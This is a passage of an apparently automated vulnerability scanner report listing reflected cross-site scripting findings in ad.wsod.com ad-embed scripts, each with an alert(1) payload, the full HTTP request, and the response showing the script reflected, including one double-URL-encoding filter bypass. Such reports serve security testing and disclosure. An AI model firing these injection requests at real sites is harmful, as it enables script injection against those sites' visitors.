5.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5 was submitted in the REST URL parameter 3. This input was echoed as d9bf5";alert(1)//b0a835980d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5";alert(1)//b0a835980d5/1303843050**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c
...[SNIP]...

5.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31049"-alert(1)-"aab598a9703 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843028**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a8a"-alert(1)-"d8d13c332e8 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843023**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Ge2a8a"-alert(1)-"d8d13c332e8&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b9ef"-alert(1)-"fca189d9ed0 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
c="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!4b9ef"-alert(1)-"fca189d9ed0&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da8c"-alert(1)-"7e28ca43465 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&7da8c"-alert(1)-"7e28ca43465=1">
...[SNIP]...

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c33'-alert(1)-'0a2fa29519b was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:05 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843025:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:05 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898e2c33'-alert(1)-'0a2fa29519b&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
...[SNIP]...

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9758b'-alert(1)-'3377d1f28de was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:01 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843021:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!9758b'-alert(1)-'3377d1f28de&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               re
...[SNIP]...

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d8f8'-alert(1)-'9db56fcbc1b was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:19 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843039:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:19 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=17974586289d8f8'-alert(1)-'9db56fcbc1b&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       docume
...[SNIP]...

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc220'-alert(1)-'63411dca46a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:34 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843054:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3cc220'-alert(1)-'63411dca46a';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b108
...[SNIP]...

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88997'-alert(1)-'ecbfd9fe416 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:29 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843049:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ88997'-alert(1)-'ecbfd9fe416&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('
...[SNIP]...

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df16'-alert(1)-'6ca3ac2d5fd was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:14 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843034:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534882df16'-alert(1)-'6ca3ac2d5fd&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image35
...[SNIP]...

